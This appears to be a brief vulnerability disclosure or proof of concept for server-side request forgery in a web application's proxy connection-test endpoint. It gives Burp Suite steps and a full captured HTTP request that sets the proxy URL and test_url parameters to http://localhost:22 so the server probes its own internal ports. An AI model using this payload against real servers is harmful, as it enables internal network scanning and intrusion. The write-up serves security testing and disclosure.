ssrf in https://vulnerableserver.com/http_proxies/test_connection
Affected parameters:
http_proxy[url]
test_ur

• Fill the values and Capture the request with BurpSuite
• In the Repeater tab change the parameter values http_proxy[url] and/or test_url for: http://localhost:22
By default the SSH (22) port is not open:
HTTP Request:
PUT /http_proxies/test_connection HTTP/2
Host: vulnerableserver.com
Cookie: timezone=Europe%2FAmsterdam; _session_id=70c6c0638ec6aad4bd733570fd807267
Content-Length: 381
Sec-Ch-Ua-Platform: "Windows"
X-Csrf-Token: DQmNtiYbhAdFABfamR7mZy7WhruFtY2jjAWrtRPGu5PqmaJwrsCB9Y7hqQZmsCaqNv1VN2aDsxeBBSsgpA478g
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Chromium";v="129", "Not=A?Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71
Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://vulnerableserver.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://vulnerableserver.com/http_proxies/new
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
authenticity_token=DQmNtiYbhAdFABfamR7mZy7WhruFtY2jjAWrtRPGu5PqmaJwrsCB9Y7hqQZmsCaqNv1VN2aDsxeBBSsgpA478g&http_proxy%5B
name%5D=test&http_proxy%5Burl%5D=http://localhost:22&http_proxy%5Busername%5D=&fakepassword=&http_proxy%5Bcacert%5D=&te
st_url=http://localhost:22&http_proxy%5Blocation_ids%5D%5B%5D=&http_proxy%5Borganization_ids%5D%5B%5D=&http_proxy%5Borg
anization_ids%5D%5B%5D=1